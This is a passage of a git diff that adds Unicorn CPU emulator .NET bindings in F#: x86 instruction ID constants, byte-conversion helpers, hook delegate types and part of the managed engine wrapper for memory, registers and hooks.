UC_X86_INS_VPANDQ = 994 + let UC_X86_INS_VPAND = 995 + let UC_X86_INS_VPAVGB = 996 + let UC_X86_INS_VPAVGW = 997 + let UC_X86_INS_VPBLENDD = 998 + let UC_X86_INS_VPBLENDMB = 999 + let UC_X86_INS_VPBLENDMD = 1000 + let UC_X86_INS_VPBLENDMQ = 1001 + let UC_X86_INS_VPBLENDMW = 1002 + let UC_X86_INS_VPBLENDVB = 1003 + let UC_X86_INS_VPBLENDW = 1004 + let UC_X86_INS_VPBROADCASTB = 1005 + let UC_X86_INS_VPBROADCASTD = 1006 + let UC_X86_INS_VPBROADCASTMB2Q = 1007 + let UC_X86_INS_VPBROADCASTMW2D = 1008 + let UC_X86_INS_VPBROADCASTQ = 1009 + let UC_X86_INS_VPBROADCASTW = 1010 + let UC_X86_INS_VPCLMULQDQ = 1011 + let UC_X86_INS_VPCMOV = 1012 + let UC_X86_INS_VPCMPB = 1013 + let UC_X86_INS_VPCMPD = 1014 + let UC_X86_INS_VPCMPEQB = 1015 + let UC_X86_INS_VPCMPEQD = 1016 + let UC_X86_INS_VPCMPEQQ = 1017 + let UC_X86_INS_VPCMPEQW = 1018 + let UC_X86_INS_VPCMPESTRI = 1019 + let UC_X86_INS_VPCMPESTRM = 1020 + let UC_X86_INS_VPCMPGTB = 1021 + let UC_X86_INS_VPCMPGTD = 1022 + let UC_X86_INS_VPCMPGTQ = 1023 + let UC_X86_INS_VPCMPGTW = 1024 + let UC_X86_INS_VPCMPISTRI = 1025 + let UC_X86_INS_VPCMPISTRM = 1026 + let UC_X86_INS_VPCMPQ = 1027 + let UC_X86_INS_VPCMPUB = 1028 + let UC_X86_INS_VPCMPUD = 1029 + let UC_X86_INS_VPCMPUQ = 1030 + let UC_X86_INS_VPCMPUW = 1031 + let UC_X86_INS_VPCMPW = 1032 + let UC_X86_INS_VPCOMB = 1033 + let UC_X86_INS_VPCOMD = 1034 + let UC_X86_INS_VPCOMPRESSD = 1035 + let UC_X86_INS_VPCOMPRESSQ = 1036 + let UC_X86_INS_VPCOMQ = 1037 + let UC_X86_INS_VPCOMUB = 1038 + let UC_X86_INS_VPCOMUD = 1039 + let UC_X86_INS_VPCOMUQ = 1040 + let UC_X86_INS_VPCOMUW = 1041 + let UC_X86_INS_VPCOMW = 1042 + let UC_X86_INS_VPCONFLICTD = 1043 + let UC_X86_INS_VPCONFLICTQ = 1044 + let UC_X86_INS_VPERM2F128 = 1045 + let UC_X86_INS_VPERM2I128 = 1046 + let UC_X86_INS_VPERMD = 1047 + let UC_X86_INS_VPERMI2D = 1048 + let UC_X86_INS_VPERMI2PD = 1049 + let UC_X86_INS_VPERMI2PS = 1050 + let UC_X86_INS_VPERMI2Q = 1051 + let UC_X86_INS_VPERMIL2PD = 1052 + let UC_X86_INS_VPERMIL2PS = 1053 + let UC_X86_INS_VPERMILPD = 1054 + let UC_X86_INS_VPERMILPS = 1055 + let UC_X86_INS_VPERMPD = 1056 + let UC_X86_INS_VPERMPS = 1057 + let UC_X86_INS_VPERMQ = 1058 + let UC_X86_INS_VPERMT2D = 1059 + let UC_X86_INS_VPERMT2PD = 1060 + let UC_X86_INS_VPERMT2PS = 1061 + let UC_X86_INS_VPERMT2Q = 1062 + let UC_X86_INS_VPEXPANDD = 1063 + let UC_X86_INS_VPEXPANDQ = 1064 + let UC_X86_INS_VPEXTRB = 1065 + let UC_X86_INS_VPEXTRD = 1066 + let UC_X86_INS_VPEXTRQ = 1067 + let UC_X86_INS_VPEXTRW = 1068 + let UC_X86_INS_VPGATHERDD = 1069 + let UC_X86_INS_VPGATHERDQ = 1070 + let UC_X86_INS_VPGATHERQD = 1071 + let UC_X86_INS_VPGATHERQQ = 1072 + let UC_X86_INS_VPHADDBD = 1073 + let UC_X86_INS_VPHADDBQ = 1074 + let UC_X86_INS_VPHADDBW = 1075 + let UC_X86_INS_VPHADDDQ = 1076 + let UC_X86_INS_VPHADDD = 1077 + let UC_X86_INS_VPHADDSW = 1078 + let UC_X86_INS_VPHADDUBD = 1079 + let UC_X86_INS_VPHADDUBQ = 1080 + let UC_X86_INS_VPHADDUBW = 1081 + let UC_X86_INS_VPHADDUDQ = 1082 + let UC_X86_INS_VPHADDUWD = 1083 + let UC_X86_INS_VPHADDUWQ = 1084 + let UC_X86_INS_VPHADDWD = 1085 + let UC_X86_INS_VPHADDWQ = 1086 + let UC_X86_INS_VPHADDW = 1087 + let UC_X86_INS_VPHMINPOSUW = 1088 + let UC_X86_INS_VPHSUBBW = 1089 + let UC_X86_INS_VPHSUBDQ = 1090 + let UC_X86_INS_VPHSUBD = 1091 + let UC_X86_INS_VPHSUBSW = 1092 + let UC_X86_INS_VPHSUBWD = 1093 + let UC_X86_INS_VPHSUBW = 1094 + let UC_X86_INS_VPINSRB = 1095 + let UC_X86_INS_VPINSRD = 1096 + let UC_X86_INS_VPINSRQ = 1097 + let UC_X86_INS_VPINSRW = 1098 + let UC_X86_INS_VPLZCNTD = 1099 + let UC_X86_INS_VPLZCNTQ = 1100 + let UC_X86_INS_VPMACSDD = 1101 + let UC_X86_INS_VPMACSDQH = 1102 + let UC_X86_INS_VPMACSDQL = 1103 + let UC_X86_INS_VPMACSSDD = 1104 + let UC_X86_INS_VPMACSSDQH = 1105 + let UC_X86_INS_VPMACSSDQL = 1106 + let UC_X86_INS_VPMACSSWD = 1107 + let UC_X86_INS_VPMACSSWW = 1108 + let UC_X86_INS_VPMACSWD = 1109 + let UC_X86_INS_VPMACSWW = 1110 + let UC_X86_INS_VPMADCSSWD = 1111 + let UC_X86_INS_VPMADCSWD = 1112 + let UC_X86_INS_VPMADDUBSW = 1113 + let UC_X86_INS_VPMADDWD = 1114 + let UC_X86_INS_VPMASKMOVD = 1115 + let UC_X86_INS_VPMASKMOVQ = 1116 + let UC_X86_INS_VPMAXSB = 1117 + let UC_X86_INS_VPMAXSD = 1118 + let UC_X86_INS_VPMAXSQ = 1119 + let UC_X86_INS_VPMAXSW = 1120 + let UC_X86_INS_VPMAXUB = 1121 + let UC_X86_INS_VPMAXUD = 1122 + let UC_X86_INS_VPMAXUQ = 1123 + let UC_X86_INS_VPMAXUW = 1124 + let UC_X86_INS_VPMINSB = 1125 + let UC_X86_INS_VPMINSD = 1126 + let UC_X86_INS_VPMINSQ = 1127 + let UC_X86_INS_VPMINSW = 1128 + let UC_X86_INS_VPMINUB = 1129 + let UC_X86_INS_VPMINUD = 1130 + let UC_X86_INS_VPMINUQ = 1131 + let UC_X86_INS_VPMINUW = 1132 + let UC_X86_INS_VPMOVDB = 1133 + let UC_X86_INS_VPMOVDW = 1134 + let UC_X86_INS_VPMOVM2B = 1135 + let UC_X86_INS_VPMOVM2D = 1136 + let UC_X86_INS_VPMOVM2Q = 1137 + let UC_X86_INS_VPMOVM2W = 1138 + let UC_X86_INS_VPMOVMSKB = 1139 + let UC_X86_INS_VPMOVQB = 1140 + let UC_X86_INS_VPMOVQD = 1141 + let UC_X86_INS_VPMOVQW = 1142 + let UC_X86_INS_VPMOVSDB = 1143 + let UC_X86_INS_VPMOVSDW = 1144 + let UC_X86_INS_VPMOVSQB = 1145 + let UC_X86_INS_VPMOVSQD = 1146 + let UC_X86_INS_VPMOVSQW = 1147 + let UC_X86_INS_VPMOVSXBD = 1148 + let UC_X86_INS_VPMOVSXBQ = 1149 + let UC_X86_INS_VPMOVSXBW = 1150 + let UC_X86_INS_VPMOVSXDQ = 1151 + let UC_X86_INS_VPMOVSXWD = 1152 + let UC_X86_INS_VPMOVSXWQ = 1153 + let UC_X86_INS_VPMOVUSDB = 1154 + let UC_X86_INS_VPMOVUSDW = 1155 + let UC_X86_INS_VPMOVUSQB = 1156 + let UC_X86_INS_VPMOVUSQD = 1157 + let UC_X86_INS_VPMOVUSQW = 1158 + let UC_X86_INS_VPMOVZXBD = 1159 + let UC_X86_INS_VPMOVZXBQ = 1160 + let UC_X86_INS_VPMOVZXBW = 1161 + let UC_X86_INS_VPMOVZXDQ = 1162 + let UC_X86_INS_VPMOVZXWD = 1163 + let UC_X86_INS_VPMOVZXWQ = 1164 + let UC_X86_INS_VPMULDQ = 1165 + let UC_X86_INS_VPMULHRSW = 1166 + let UC_X86_INS_VPMULHUW = 1167 + let UC_X86_INS_VPMULHW = 1168 + let UC_X86_INS_VPMULLD = 1169 + let UC_X86_INS_VPMULLQ = 1170 + let UC_X86_INS_VPMULLW = 1171 + let UC_X86_INS_VPMULUDQ = 1172 + let UC_X86_INS_VPORD = 1173 + let UC_X86_INS_VPORQ = 1174 + let UC_X86_INS_VPOR = 1175 + let UC_X86_INS_VPPERM = 1176 + let UC_X86_INS_VPROTB = 1177 + let UC_X86_INS_VPROTD = 1178 + let UC_X86_INS_VPROTQ = 1179 + let UC_X86_INS_VPROTW = 1180 + let UC_X86_INS_VPSADBW = 1181 + let UC_X86_INS_VPSCATTERDD = 1182 + let UC_X86_INS_VPSCATTERDQ = 1183 + let UC_X86_INS_VPSCATTERQD = 1184 + let UC_X86_INS_VPSCATTERQQ = 1185 + let UC_X86_INS_VPSHAB = 1186 + let UC_X86_INS_VPSHAD = 1187 + let UC_X86_INS_VPSHAQ = 1188 + let UC_X86_INS_VPSHAW = 1189 + let UC_X86_INS_VPSHLB = 1190 + let UC_X86_INS_VPSHLD = 1191 + let UC_X86_INS_VPSHLQ = 1192 + let UC_X86_INS_VPSHLW = 1193 + let UC_X86_INS_VPSHUFB = 1194 + let UC_X86_INS_VPSHUFD = 1195 + let UC_X86_INS_VPSHUFHW = 1196 + let UC_X86_INS_VPSHUFLW = 1197 + let UC_X86_INS_VPSIGNB = 1198 + let UC_X86_INS_VPSIGND = 1199 + let UC_X86_INS_VPSIGNW = 1200 + let UC_X86_INS_VPSLLDQ = 1201 + let UC_X86_INS_VPSLLD = 1202 + let UC_X86_INS_VPSLLQ = 1203 + let UC_X86_INS_VPSLLVD = 1204 + let UC_X86_INS_VPSLLVQ = 1205 + let UC_X86_INS_VPSLLW = 1206 + let UC_X86_INS_VPSRAD = 1207 + let UC_X86_INS_VPSRAQ = 1208 + let UC_X86_INS_VPSRAVD = 1209 + let UC_X86_INS_VPSRAVQ = 1210 + let UC_X86_INS_VPSRAW = 1211 + let UC_X86_INS_VPSRLDQ = 1212 + let UC_X86_INS_VPSRLD = 1213 + let UC_X86_INS_VPSRLQ = 1214 + let UC_X86_INS_VPSRLVD = 1215 + let UC_X86_INS_VPSRLVQ = 1216 + let UC_X86_INS_VPSRLW = 1217 + let UC_X86_INS_VPSUBB = 1218 + let UC_X86_INS_VPSUBD = 1219 + let UC_X86_INS_VPSUBQ = 1220 + let UC_X86_INS_VPSUBSB = 1221 + let UC_X86_INS_VPSUBSW = 1222 + let UC_X86_INS_VPSUBUSB = 1223 + let UC_X86_INS_VPSUBUSW = 1224 + let UC_X86_INS_VPSUBW = 1225 + let UC_X86_INS_VPTESTMD = 1226 + let UC_X86_INS_VPTESTMQ = 1227 + let UC_X86_INS_VPTESTNMD = 1228 + let UC_X86_INS_VPTESTNMQ = 1229 + let UC_X86_INS_VPTEST = 1230 + let UC_X86_INS_VPUNPCKHBW = 1231 + let UC_X86_INS_VPUNPCKHDQ = 1232 + let UC_X86_INS_VPUNPCKHQDQ = 1233 + let UC_X86_INS_VPUNPCKHWD = 1234 + let UC_X86_INS_VPUNPCKLBW = 1235 + let UC_X86_INS_VPUNPCKLDQ = 1236 + let UC_X86_INS_VPUNPCKLQDQ = 1237 + let UC_X86_INS_VPUNPCKLWD = 1238 + let UC_X86_INS_VPXORD = 1239 + let UC_X86_INS_VPXORQ = 1240 + let UC_X86_INS_VPXOR = 1241 + let UC_X86_INS_VRCP14PD = 1242 + let UC_X86_INS_VRCP14PS = 1243 + let UC_X86_INS_VRCP14SD = 1244 + let UC_X86_INS_VRCP14SS = 1245 + let UC_X86_INS_VRCP28PD = 1246 + let UC_X86_INS_VRCP28PS = 1247 + let UC_X86_INS_VRCP28SD = 1248 + let UC_X86_INS_VRCP28SS = 1249 + let UC_X86_INS_VRCPPS = 1250 + let UC_X86_INS_VRCPSS = 1251 + let UC_X86_INS_VRNDSCALEPD = 1252 + let UC_X86_INS_VRNDSCALEPS = 1253 + let UC_X86_INS_VRNDSCALESD = 1254 + let UC_X86_INS_VRNDSCALESS = 1255 + let UC_X86_INS_VROUNDPD = 1256 + let UC_X86_INS_VROUNDPS = 1257 + let UC_X86_INS_VROUNDSD = 1258 + let UC_X86_INS_VROUNDSS = 1259 + let UC_X86_INS_VRSQRT14PD = 1260 + let UC_X86_INS_VRSQRT14PS = 1261 + let UC_X86_INS_VRSQRT14SD = 1262 + let UC_X86_INS_VRSQRT14SS = 1263 + let UC_X86_INS_VRSQRT28PD = 1264 + let UC_X86_INS_VRSQRT28PS = 1265 + let UC_X86_INS_VRSQRT28SD = 1266 + let UC_X86_INS_VRSQRT28SS = 1267 + let UC_X86_INS_VRSQRTPS = 1268 + let UC_X86_INS_VRSQRTSS = 1269 + let UC_X86_INS_VSCATTERDPD = 1270 + let UC_X86_INS_VSCATTERDPS = 1271 + let UC_X86_INS_VSCATTERPF0DPD = 1272 + let UC_X86_INS_VSCATTERPF0DPS = 1273 + let UC_X86_INS_VSCATTERPF0QPD = 1274 + let UC_X86_INS_VSCATTERPF0QPS = 1275 + let UC_X86_INS_VSCATTERPF1DPD = 1276 + let UC_X86_INS_VSCATTERPF1DPS = 1277 + let UC_X86_INS_VSCATTERPF1QPD = 1278 + let UC_X86_INS_VSCATTERPF1QPS = 1279 + let UC_X86_INS_VSCATTERQPD = 1280 + let UC_X86_INS_VSCATTERQPS = 1281 + let UC_X86_INS_VSHUFPD = 1282 + let UC_X86_INS_VSHUFPS = 1283 + let UC_X86_INS_VSQRTPD = 1284 + let UC_X86_INS_VSQRTPS = 1285 + let UC_X86_INS_VSQRTSD = 1286 + let UC_X86_INS_VSQRTSS = 1287 + let UC_X86_INS_VSTMXCSR = 1288 + let UC_X86_INS_VSUBPD = 1289 + let UC_X86_INS_VSUBPS = 1290 + let UC_X86_INS_VSUBSD = 1291 + let UC_X86_INS_VSUBSS = 1292 + let UC_X86_INS_VTESTPD = 1293 + let UC_X86_INS_VTESTPS = 1294 + let UC_X86_INS_VUNPCKHPD = 1295 + let UC_X86_INS_VUNPCKHPS = 1296 + let UC_X86_INS_VUNPCKLPD = 1297 + let UC_X86_INS_VUNPCKLPS = 1298 + let UC_X86_INS_VZEROALL = 1299 + let UC_X86_INS_VZEROUPPER = 1300 + let UC_X86_INS_WAIT = 1301 + let UC_X86_INS_WBINVD = 1302 + let UC_X86_INS_WRFSBASE = 1303 + let UC_X86_INS_WRGSBASE = 1304 + let UC_X86_INS_WRMSR = 1305 + let UC_X86_INS_XABORT = 1306 + let UC_X86_INS_XACQUIRE = 1307 + let UC_X86_INS_XBEGIN = 1308 + let UC_X86_INS_XCHG = 1309 + let UC_X86_INS_XCRYPTCBC = 1310 + let UC_X86_INS_XCRYPTCFB = 1311 + let UC_X86_INS_XCRYPTCTR = 1312 + let UC_X86_INS_XCRYPTECB = 1313 + let UC_X86_INS_XCRYPTOFB = 1314 + let UC_X86_INS_XEND = 1315 + let UC_X86_INS_XGETBV = 1316 + let UC_X86_INS_XLATB = 1317 + let UC_X86_INS_XRELEASE = 1318 + let UC_X86_INS_XRSTOR = 1319 + let UC_X86_INS_XRSTOR64 = 1320 + let UC_X86_INS_XRSTORS = 1321 + let UC_X86_INS_XRSTORS64 = 1322 + let UC_X86_INS_XSAVE = 1323 + let UC_X86_INS_XSAVE64 = 1324 + let UC_X86_INS_XSAVEC = 1325 + let UC_X86_INS_XSAVEC64 = 1326 + let UC_X86_INS_XSAVEOPT = 1327 + let UC_X86_INS_XSAVEOPT64 = 1328 + let UC_X86_INS_XSAVES = 1329 + let UC_X86_INS_XSAVES64 = 1330 + let UC_X86_INS_XSETBV = 1331 + let UC_X86_INS_XSHA1 = 1332 + let UC_X86_INS_XSHA256 = 1333 + let UC_X86_INS_XSTORE = 1334 + let UC_X86_INS_XTEST = 1335 + let UC_X86_INS_FDISI8087_NOP = 1336 + let UC_X86_INS_FENI8087_NOP = 1337 + let UC_X86_INS_ENDING = 1338 + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/ConvertUtility.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/ConvertUtility.fs new file mode 100644 index 0000000..5e455bf --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/ConvertUtility.fs @@ -0,0 +1,21 @@ +namespace UnicornManaged + +open System + +[] +module internal ConvertUtility = + + let int64ToBytes(v: Int64) = + let res = Array.zeroCreate 8 + let mutable uv = uint64 v + for i = 0 to res.Length-1 do + res.[i] <- byte (uv &&& uint64 0xFF) + uv <- uv >>> 8 + res + + let bytesToInt64(v: Byte array) = + let mutable res = uint64 0 + for i = 0 to v.Length-1 do + let tmpV = v.[i] &&& byte 0xFF + res <- res + (uint64 tmpV <<< (i * 8)) + int64 res \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/InternalHooks.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/InternalHooks.fs new file mode 100644 index 0000000..36cfc3c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/InternalHooks.fs @@ -0,0 +1,32 @@ +namespace UnicornManaged + +open System +open System.Runtime.InteropServices + +// internal hooks to be passed to native Unicorn library +[] +type internal CodeHookInternal = delegate of IntPtr * Int64 * Int32 * IntPtr -> unit + +[] +type internal BlockHookInternal = delegate of IntPtr * Int64 * Int32 * IntPtr -> unit + +[] +type internal InterruptHookInternal = delegate of IntPtr * Int32 * IntPtr -> unit + +[] +type internal MemReadHookInternal = delegate of IntPtr * Int64 * Int32 * IntPtr -> unit + +[] +type internal MemWriteHookInternal = delegate of IntPtr * Int64 * Int32 * Int64 * IntPtr -> unit + +[] +type internal EventMemHookInternal = delegate of IntPtr * Int32 * Int64 * Int32 * Int64 * IntPtr-> Boolean + +[] +type internal InHookInternal = delegate of IntPtr * Int32 * Int32 * IntPtr -> Int32 + +[] +type internal OutHookInternal = delegate of IntPtr * Int32 * Int32 * Int32 * IntPtr -> unit + +[] +type internal SyscallHookInternal = delegate of IntPtr * IntPtr -> unit \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Unicorn.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Unicorn.fs new file mode 100644 index 0000000..0a05d30 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Unicorn.fs @@ -0,0 +1,343 @@ +namespace UnicornManaged + +open System +open System.Threading +open System.Collections.Generic +open System.Runtime.InteropServices +open System.Linq +open UnicornManaged.Const +open UnicornManaged.Binding + +// exported hooks +type CodeHook = delegate of Unicorn * Int64 * Int32 * Object -> unit +and BlockHook = delegate of Unicorn * Int64 * Int32 * Object -> unit +and InterruptHook = delegate of Unicorn * Int32 * Object -> unit +and MemReadHook = delegate of Unicorn * Int64 * Int32 * Object -> unit +and MemWriteHook = delegate of Unicorn * Int64 * Int32 * Int64 * Object -> unit +and EventMemHook = delegate of Unicorn * Int32 * Int64 * Int32 * Int64 * Object -> Boolean +and InHook = delegate of Unicorn * Int32 * Int32 * Object -> Int32 +and OutHook = delegate of Unicorn * Int32 * Int32 * Int32 * Object -> unit +and SyscallHook = delegate of Unicorn * Object -> unit + +// the managed unicorn engine +and Unicorn(arch: Int32, mode: Int32, binding: IBinding) = + + // hook callback list + let _codeHooks = new List<(CodeHook * Object)>() + let _blockHooks = new List<(BlockHook * Object)>() + let _interruptHooks = new List<(InterruptHook * Object)>() + let _memReadHooks = new List<(MemReadHook * Object)>() + let _memWriteHooks = new List<(MemWriteHook * Object)>() + let _memEventHooks = new Dictionary>() + let _inHooks = new List<(InHook * Object)>() + let _outHooks = new List<(OutHook * Object)>() + let _syscallHooks = new List<(SyscallHook * Object)>() + let _disposablePointers = new List() + + let _eventMemMap = + [ + (UC_HOOK_MEM_READ_UNMAPPED, UC_MEM_READ_UNMAPPED) + (UC_HOOK_MEM_WRITE_UNMAPPED, UC_MEM_WRITE_UNMAPPED) + (UC_HOOK_MEM_FETCH_UNMAPPED, UC_MEM_FETCH_UNMAPPED) + (UC_HOOK_MEM_READ_PROT, UC_MEM_READ_PROT) + (UC_HOOK_MEM_WRITE_PROT, UC_MEM_WRITE_PROT) + (UC_HOOK_MEM_FETCH_PROT, UC_MEM_FETCH_PROT) + ] |> dict + + let mutable _eng = [|UIntPtr.Zero|] + + let checkResult(errCode: Int32, errMsg: String) = + if errCode <> Common.UC_ERR_OK then raise(ApplicationException(String.Format("{0}. Error: {1}", errMsg, errCode))) + + let hookDel(callbacks: List<'a * Object>) (callback: 'a)= + // TODO: invoke the native function in order to not call the trampoline anymore + callbacks + |> Seq.tryFind(fun item -> match item with | (c, _) -> c = callback) + |> (fun k -> if k.IsSome then callbacks.Remove(k.Value) |> ignore) + + let allocate(size: Int32) = + let mem = Marshal.AllocHGlobal(size) + _disposablePointers.Add(mem) + mem.ToPointer() + + do + // initialize event list + _eventMemMap + |> Seq.map(fun kv -> kv.Key) + |> Seq.iter (fun eventType -> _memEventHooks.Add(eventType, new List())) + + // init engine + _eng <- [|new UIntPtr(allocate(IntPtr.Size))|] + let err = binding.UcOpen(uint32 arch, uint32 mode, _eng) + checkResult(err, "Unable to open the Unicorn Engine") + + new(arch, mode) = new Unicorn(arch, mode, BindingFactory.getDefault()) + + member private this.CheckResult(errorCode: Int32) = + // return the exception instead of raising it in order to have a more meaningful stack trace + if errorCode <> Common.UC_ERR_OK then + let errorMessage = this.StrError(errorCode) + Some <| UnicornEngineException(errorCode, errorMessage) + else None + + member this.MemMap(address: Int64, size: Int64, perm: Int32) = + let size = new UIntPtr(uint64 size) + match binding.MemMap(_eng.[0], uint64 address, size, uint32 perm) |> this.CheckResult with + | Some e -> raise e | None -> () + + member this.MemMapPtr(address: Int64, size: Int64, perm: Int32, ptr: IntPtr) = + let size = new UIntPtr(uint64 size) + let ptr = new UIntPtr(ptr.ToPointer()) + match binding.MemMapPtr(_eng.[0], uint64 address, size, uint32 perm, ptr) |> this.CheckResult with + | Some e -> raise e | None -> () + + member this.MemUnmap(address: Int64, size: Int64) = + let size = new UIntPtr(uint64 size) + match binding.MemUnmap(_eng.[0], uint64 address, size) |> this.CheckResult with + | Some e -> raise e | None -> () + + member this.MemProtect(address: Int64, size: Int64, ?perm: Int32) = + let size = new UIntPtr(uint64 size) + let perm = defaultArg perm Common.UC_PROT_ALL + match binding.MemProtect(_eng.[0], uint64 address, size, uint32 perm) |> this.CheckResult with + | Some e -> raise e | None -> () + + member this.MemWrite(address: Int64, value: Byte array) = + match binding.MemWrite(_eng.[0], uint64 address, value, new UIntPtr(uint32 value.Length)) |> this.CheckResult with + | Some e -> raise e | None -> () + + member this.MemRead(address: Int64, memValue: Byte array) = + match binding.MemRead(_eng.[0], uint64 address, memValue, new UIntPtr(uint32 memValue.Length)) |> this.CheckResult with + | Some e -> raise e | None -> () + + member this.RegWrite(regId: Int32, value: Byte array) = + match binding.RegWrite(_eng.[0], regId, value) |> this.CheckResult with + | Some e -> raise e | None -> () + + member this.RegWrite(regId: Int32, value: Int64) = + this.RegWrite(regId, int64ToBytes value) + + member this.RegRead(regId: Int32, regValue: Byte array) = + match binding.RegRead(_eng.[0], regId, regValue) |> this.CheckResult with + | Some e -> raise e | None -> () + + member this.RegRead(regId: Int32) = + let buffer = Array.zeroCreate 8 + this.RegRead(regId, buffer) + bytesToInt64 buffer + + member this.EmuStart(beginAddr: Int64, untilAddr: Int64, timeout: Int64, count: Int64) = + match binding.EmuStart(_eng.[0], uint64 beginAddr, uint64 untilAddr, uint64 timeout, uint64 count) |> this.CheckResult with + | Some e -> raise e | None -> () + + member this.EmuStop() = + match binding.EmuStop(_eng.[0]) |> this.CheckResult with + | Some e -> raise e | None -> () + + member this.Close() = + match binding.Close(_eng.[0]) |> this.CheckResult with + | Some e -> raise e | None -> () + + member this.ArchSupported(arch: Int32) = + binding.ArchSupported(arch) + + member this.ErrNo() = + binding.Errono(_eng.[0]) + + member this.StrError(errorNo: Int32) = + let errorStringPointer = binding.Strerror(errorNo) + Marshal.PtrToStringAnsi(errorStringPointer) + + member this.AddCodeHook(callback: CodeHook, userData: Object, beginAddr: Int64, endAddr: Int64) = + let trampoline(u: IntPtr) (addr: Int64) (size: Int32) (user: IntPtr) = + _codeHooks + |> Seq.iter(fun (callback, userData) -> callback.Invoke(this, addr, size, userData)) + + if _codeHooks |> Seq.isEmpty then + let funcPointer = Marshal.GetFunctionPointerForDelegate(new CodeHookInternal(trampoline)) + let hh = new UIntPtr(allocate(IntPtr.Size)) + match binding.HookAddNoarg(_eng.[0], hh, Common.UC_HOOK_CODE, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr) |> this.CheckResult with + | Some e -> raise e | None -> () + + _codeHooks.Add(callback, userData) + + member this.AddCodeHook(callback: CodeHook, beginAddr: Int64, endAddr: Int64) = + this.AddCodeHook(callback, null, beginAddr, endAddr) + + member this.HookDel(callback: CodeHook) = + hookDel _codeHooks callback + + member this.AddBlockHook(callback: BlockHook, userData: Object, beginAddr: Int64, endAddr: Int64) = + let trampoline(u: IntPtr) (addr: Int64) (size: Int32) (user: IntPtr) = + _blockHooks + |> Seq.iter(fun (callback, userData) -> callback.Invoke(this, addr, size, userData)) + + if _blockHooks |> Seq.isEmpty then + let funcPointer = Marshal.GetFunctionPointerForDelegate(new BlockHookInternal(trampoline)) + let hh = new UIntPtr(allocate(IntPtr.Size)) + match binding.HookAddNoarg(_eng.[0], hh, Common.UC_HOOK_BLOCK, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr) |> this.CheckResult with + | Some e -> raise e | None -> () + + _blockHooks.Add(callback, userData) + + member this.HookDel(callback: BlockHook) = + hookDel _blockHooks callback + + member this.AddInterruptHook(callback: InterruptHook, userData: Object, hookBegin: UInt64, hookEnd : UInt64) = + let trampoline(u: IntPtr) (intNumber: Int32) (user: IntPtr) = + _interruptHooks + |> Seq.iter(fun (callback, userData) -> callback.Invoke(this, intNumber, userData)) + + if _interruptHooks |> Seq.isEmpty then + let funcPointer = Marshal.GetFunctionPointerForDelegate(new InterruptHookInternal(trampoline)) + let hh = new UIntPtr(allocate(IntPtr.Size)) + match binding.HookAddNoarg(_eng.[0], hh, Common.UC_HOOK_INTR, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, hookBegin, hookEnd) |> this.CheckResult with + | Some e -> raise e | None -> () + + _interruptHooks.Add(callback, userData) + + member this.AddInterruptHook(callback: InterruptHook) = + this.AddInterruptHook(callback, null, uint64 1, uint64 0) + + member this.HookDel(callback: InterruptHook) = + hookDel _interruptHooks callback + + member this.AddMemReadHook(callback: MemReadHook, userData: Object, beginAddr: Int64, endAddr: Int64) = + let trampoline(u: IntPtr) (addr: Int64) (size: Int32) (user: IntPtr) = + _memReadHooks + |> Seq.iter(fun (callback, userData) -> callback.Invoke(this, addr, size, userData)) + + if _memReadHooks |> Seq.isEmpty then + let funcPointer = Marshal.GetFunctionPointerForDelegate(new MemReadHookInternal(trampoline)) + let hh = new UIntPtr(allocate(IntPtr.Size)) + match binding.HookAddNoarg(_eng.[0], hh, Common.UC_HOOK_MEM_READ, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr) |> this.CheckResult with + | Some e -> raise e | None -> () + + _memReadHooks.Add(callback, userData) + + member this.HookDel(callback: MemReadHook) = + hookDel _memReadHooks callback + + member this.AddMemWriteHook(callback: MemWriteHook, userData: Object, beginAddr: Int64, endAddr: Int64) = + let trampoline(u: IntPtr) (addr: Int64) (size: Int32) (value: Int64) (user: IntPtr) = + _memWriteHooks + |> Seq.iter(fun (callback, userData) -> callback.Invoke(this, addr, size, value, userData)) + + if _memWriteHooks |> Seq.isEmpty then + let funcPointer = Marshal.GetFunctionPointerForDelegate(new MemWriteHookInternal(trampoline)) + let hh = new UIntPtr(allocate(IntPtr.Size)) + match binding.HookAddNoarg(_eng.[0], hh, Common.UC_HOOK_MEM_WRITE, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr) |> this.CheckResult with + | Some e -> raise e | None -> () + + _memWriteHooks.Add(callback, userData) + + member this.HookDel(callback: MemWriteHook) = + hookDel _memWriteHooks callback + + member this.AddEventMemHook(callback: EventMemHook, eventType: Int32, userData: Object) = + let trampoline(u: IntPtr) (eventType: Int32) (addr: Int64) (size: Int32) (value: Int64) (user: IntPtr) = + _memEventHooks.Keys + |> Seq.filter(fun eventFlag -> (eventType &&& eventFlag) <> 0) + |> Seq.map(fun eventflag -> _memEventHooks.[eventflag]) + |> Seq.concat + |> Seq.map(fun (callback, userData) -> callback.Invoke(this, eventType, addr, size, value, userData)) + |> Seq.forall id + + // register the event if not already done + _memEventHooks.Keys + |> Seq.filter(fun eventFlag -> (eventType &&& eventFlag) <> 0) + |> Seq.filter(fun eventFlag -> _memEventHooks.[eventFlag] |> Seq.isEmpty) + |> Seq.iter(fun eventFlag -> + let funcPointer = Marshal.GetFunctionPointerForDelegate(new EventMemHookInternal(trampoline)) + let hh = new UIntPtr(allocate(IntPtr.Size)) + match binding.HookAddNoarg(_eng.[0], hh, eventFlag, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 0, uint64 0) |> this.CheckResult with + | Some e -> raise e | None -> () + ) + + // register the callbacks + 